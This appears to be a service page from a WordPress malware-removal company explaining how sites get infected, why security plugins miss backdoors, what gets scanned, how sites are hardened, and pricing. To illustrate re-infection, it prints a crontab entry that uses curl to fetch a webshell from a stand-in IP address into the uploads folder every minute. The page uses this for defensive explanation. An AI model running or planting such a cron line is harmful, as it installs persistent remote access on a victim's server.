How do WordPress sites get infected?
Most WordPress infections start with an outdated or vulnerable plugin or theme, a reused or leaked admin password, or a weak link elsewhere on the same server. Once in, attackers usually drop a webshell, add a hidden admin and inject code into the theme or database. WordPress core itself is rarely the entry point.
The 2021 OWASP Top 10 lists vulnerable and outdated components as one of the most common web application risks, and WordPress sites with dozens of plugins are a clear example. Nulled (pirated) premium plugins are another frequent source: they often ship with a backdoor already inside.
On shared servers and VPSs hosting several sites, one neglected install can infect every other site the web server user can write to. That is why we scan the whole server, not only the site that is showing symptoms.
Why do security plugins miss WordPress malware?
Security plugins run inside WordPress, so they can only see what WordPress can see, and they can be disabled by the malware they are meant to catch. Backdoors in cron jobs, files outside the web root, other sites on the server or system services are invisible to them. That is the usual reason a "cleaned" site is re-infected.
A typical re-infection looks like this in the server crontab, re-downloading a webshell every minute:
# crontab -l -u www-data
* * * * * curl -s http://198.51.100.24/x.txt -o /var/www/example.co.uk/wp-content/uploads/2026/08/cache.php
# after clean-up
no crontab for www-data
Our Forensic scan checks crontabs, systemd units, running processes and users alongside the WordPress files. Read more in security plugin vs server scanning.
What we check and clean in a WordPress site
We check every layer where WordPress malware hides: core files, plugins, themes, uploads, the database, wp-config.php, user accounts and the server underneath. Each area is compared with known-good sources or checked for suspicious patterns, and anything malicious is quarantined with a hash recorded as evidence.
| Area | What we look for |
|---|---|
| Core files | Modified files compared with official WordPress checksums |
| Plugins and themes | Obfuscated code, nulled plugins, fake plugin folders, known vulnerable versions |
wp-content/uploads | PHP files, which should never be there |
| Database | Injected <script> tags in posts and wp_options, spam posts, rogue users |
wp-config.php | Overwritten database connections, injected includes, stale salts |
| Server | Cron entries, webshell kits, unexpected users and processes |
A quick way to see one common symptom yourself is to verify core files with WP-CLI:
wp core verify-checksums
Warning: File doesn't verify against checksum: wp-includes/load.php
Warning: File should not exist: wp-includes/class-wp-cache-helper.phpHow do you stop WordPress malware coming back?
Malware stays gone when the entry point is closed, persistence is removed and the site is hardened and monitored. After every clean we apply Harden playbooks, fix the vulnerable component or credential that let the attacker in, and switch on 24/7 monitoring so any change is caught early.
- PHP execution blocked in
wp-content/uploads - Theme and plugin file editing disabled with
DISALLOW_FILE_EDIT - Administrator accounts audited and reduced to those needed
- Salts rotated and all passwords reset
- Abandoned and nulled plugins removed
- SSH and firewall locked down at server level
If anything does return while you are on a plan, we clean it at no extra cost and re-investigate. For a checklist you can apply yourself, see our WordPress hardening checklist, or learn more about Harden playbooks.
Should you clean a hacked WordPress site yourself?
You can remove simple, visible malware yourself, but a DIY clean usually misses the backdoor, which is why the infection returns. If the malware has come back once already, you take payments, or several sites share the server, a server-level forensic clean-up is the safer choice.
If you want to try first, our WordPress malware removal guide covers the steps. Before you start, take a full backup for evidence, change passwords from a clean device, and do not delete anything you cannot explain. If you would rather hand it over, get protected or go to emergency help.
How much does WordPress malware removal cost?
With PatientZero, WordPress malware removal is part of a monthly plan rather than a one-off fee. Single Site is £99 a month plus a one-off £129.99 security audit and setup, and every plan includes unlimited malware removal. There is no contract and you can cancel any time.
One-off clean-ups can look cheaper at first, but they usually stop at the files you can see. If the backdoor is missed, the site is re-infected and you pay again. A plan changes the incentive: because re-infections are cleaned at no extra cost, it is in our interest to find the root cause and harden the site properly the first time.
| Plan | Price | Best for |
|---|---|---|
| Single Site | £99/month + £129.99 one-off audit and setup | One WordPress site |
| Server / Multi-site | Priced on application | Several sites on one VPS or shared server |
| Agency (white-label) | From £299/month | Agencies managing client sites |
The one-off audit means we know exactly what we are cleaning before the first removal. Fair use applies to full server rebuilds. See pricing or our guide to malware removal costs in the UK.